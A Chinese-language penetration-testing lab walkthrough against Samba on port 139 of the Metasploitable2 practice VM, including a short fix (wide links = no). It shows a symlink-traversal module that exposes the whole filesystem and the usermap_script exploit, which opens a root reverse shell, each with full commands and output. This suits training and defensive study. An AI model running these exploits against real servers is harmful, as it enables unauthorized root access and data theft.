Metasploit2: tcpport 139 – netbios-ssn |
Windows系统开启139端口, 可用工具psshutdown.exe远程关闭电脑. Samba 可运行在Microsoft Windows外的系统, 例如: UNIX, Linux, IBM System, OpenVMS和其他的系统.Samba 使用的是TCP/IP协议. 它允许主机与Windows客户端或服务器交互, 表现的好像是一个文件或打印服务器. Smbd 是Samba的一部分, 也是服务守护进程, 主要用于提供文件共享与打印机服务, 客户端需要使用SMB协议. 我们可以使用smbclient去浏览Samba服务器.
|
root@gnu:~# smbclient -U root -L 192.168.1.111 Enter root's password: Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] Server Comment --------- ------- KEE-4 METASPLOITABLE metasploitable server (Samba 3.0.20-Debian) WIN-01406122018 WIN-V300QDH8H0C Workgroup Master --------- ------- WORKGROUP METASPLOITABLE |
root@gnu:~# smbclient -U root //192.168.1.111/tmp Enter root's password: Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] smb: \> ls . D 0 Tue Jul 29 11:28:03 2014 .. DR 0 Sun May 20 14:36:12 2012 .ICE-unix DH 0 Tue Jul 29 20:46:47 2014 .X11-unix DH 0 Tue Jul 29 08:47:57 2014 .X0-lock HR 11 Tue Jul 29 08:47:57 2014 4464.jsvc_up R 0 Tue Jul 29 08:48:12 2014 56891 blocks of size 131072. 42371 blocks available smb: \> get get <filename> [localname] smb: \> get 4464.jsvc_up NT_STATUS_ACCESS_DENIED opening remote file \4464.jsvc_up
|
一个叫kcopedarookie的用户, 在youtube上发了一个0day的视频. 视频里面使用smbclient下载了/etc/passwd. 这是由于默认配置不安全导致的. 在smb.conf配置中, 设置wide links = no, 重启smbd修复问题.
|
msf auxiliary(samba_symlink_traversal) > show options Module options (auxiliary/admin/smb/samba_symlink_traversal): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.111 yes The target address RPORT 445 yes Set the SMB service port SMBSHARE tmp yes The name of a writeable share on the server SMBTARGET rootfs yes The name of the directory that should point to the root filesystem msf auxiliary(samba_symlink_traversal) > run
|
上面这个问题的产生是因为两个特性遇到了一块, 它们两个对管理员而言都很有用, 如果放到一块, 登录用户就有权访问系统上的任何文件. 默认 Samba 使用 “wide links = yes”, 可以让管理员在共享位置添加软链接, 这样客户端就可以访问. 例如: [tmp] path = /tmp read only = no guest ok = yes 管理员可以添加一个链接: ln -s /etc/passwd /tmp/passwd SMB/CIFS 客户端可以看到一个名为”passwd”的文件
|
root@gnu:~# smbclient -U root //192.168.1.111/tmp Enter root's password: Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] smb: \> ls . D 0 Tue Jul 29 11:48:25 2014 .. DR 0 Sun May 20 14:36:12 2012 .ICE-unix DH 0 Tue Jul 29 20:46:47 2014 .X11-unix DH 0 Tue Jul 29 08:47:57 2014 .X0-lock HR 11 Tue Jul 29 08:47:57 2014 4464.jsvc_up R 0 Tue Jul 29 08:48:12 2014 rootfs DR 0 Sun May 20 14:36:12 2012 56891 blocks of size 131072. 42371 blocks available smb: \> get 4464.jsvc_up NT_STATUS_ACCESS_DENIED opening remote file \4464.jsvc_up smb: \> cd rootfs\ smb: \rootfs\> ls . DR 0 Sun May 20 14:36:12 2012 .. DR 0 Sun May 20 14:36:12 2012 initrd DR 0 Tue Mar 16 18:57:40 2010 media DR 0 Tue Mar 16 18:55:52 2010 bin DR 0 Sun May 13 23:35:33 2012 lost+found DR 0 Tue Mar 16 18:55:15 2010 mnt DR 0 Wed Apr 28 16:16:56 2010 sbin DR 0 Sun May 13 21:54:53 2012 initrd.img R 7929183 Sun May 13 23:35:56 2012 home DR 0 Fri Apr 16 02:16:02 2010 lib DR 0 Sun May 13 23:35:22 2012 usr DR 0 Wed Apr 28 00:06:37 2010 proc DR 0 Tue Jul 29 20:46:33 2014 root DR 0 Tue Jul 29 08:47:57 2014 sys DR 0 Tue Jul 29 20:46:34 2014 boot DR 0 Sun May 13 23:36:28 2012 nohup.out R 8705 Tue Jul 29 08:47:57 2014 etc DR 0 Tue Jul 29 08:47:53 2014 dev DR 0 Tue Jul 29 20:46:48 2014 vmlinuz R 1987288 Thu Apr 10 12:55:41 2008 opt DR 0 Tue Mar 16 18:57:39 2010 var DR 0 Sun May 20 17:30:19 2012 cdrom DR 0 Tue Mar 16 18:55:51 2010 tmp D 0 Tue Jul 29 11:48:25 2014 srv DR 0 Tue Mar 16 18:57:38 2010 56891 blocks of size 131072. 42371 blocks available
|
我们可以使用usermap_script攻击模块获取一个Samba的shell. |
msf > use exploit/multi/samba/usermap_script msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Exploit target: Id Name -- ---- 0 Automatic msf exploit(usermap_script) > set RHOST 192.168.1.111 RHOST => 192.168.1.111 msf exploit(usermap_script) > run [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 7UDa3hwWyQYwH9FP; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "7UDa3hwWyQYwH9FP\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.1.113:4444 -> 192.168.1.111:47271) at 2014-07-29 23:49:04 -0400 id uid=0(root) gid=0(root)
|